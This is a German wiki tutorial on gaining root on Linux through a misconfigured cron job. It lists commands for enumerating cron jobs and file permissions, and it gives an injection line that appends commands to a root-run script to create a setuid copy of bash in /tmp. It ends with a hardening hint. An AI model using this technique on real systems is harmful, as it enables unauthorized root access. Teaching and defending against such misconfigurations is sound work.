Privilege Escalation über falsch konfigurierten Cronjob
Aus Xinux Wiki
Zur Navigation springen
Zur Suche springen
Zielsetzung
- Root-Rechte durch unsichere Cronjob-Konfiguration erlangen.
Wie entdeckt man die Schwachstelle?
- Benutzer-Cronjobs prüfen
- Systemweite Cronjobs prüfen
- cat /etc/crontab
- ls -la /etc/cron.d/
- ls -la /etc/cron.hourly/
- ls -la /etc/cron.daily/
- ls -la /etc/cron.weekly/
- ls -la /etc/cron.monthly/
- Dateiberechtigungen prüfen
- ls -l /pfad/zum/skript.sh
- Verdächtig
- Skripte, die von normalen Benutzern bearbeitet werden können und als root ausgeführt werden.
Voraussetzungen
| Bedingung |
Beschreibung
|
| Schwacher Cronjob |
Existiert
|
| Lokaler Zugriff |
Vorhanden
|
| shell Zugriff |
Vorhanden
|
Angriff: Code einschleusen
- Skript manipulieren
- echo "cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash" >> /opt/backup.sh
- Warten, bis Cronjob ausgeführt wird.
- Root-Shell starten
- Erwartung
Hinweise
- Dateien, die von root ausgeführt werden, müssen sicher konfiguriert sein (nur root schreibbar).
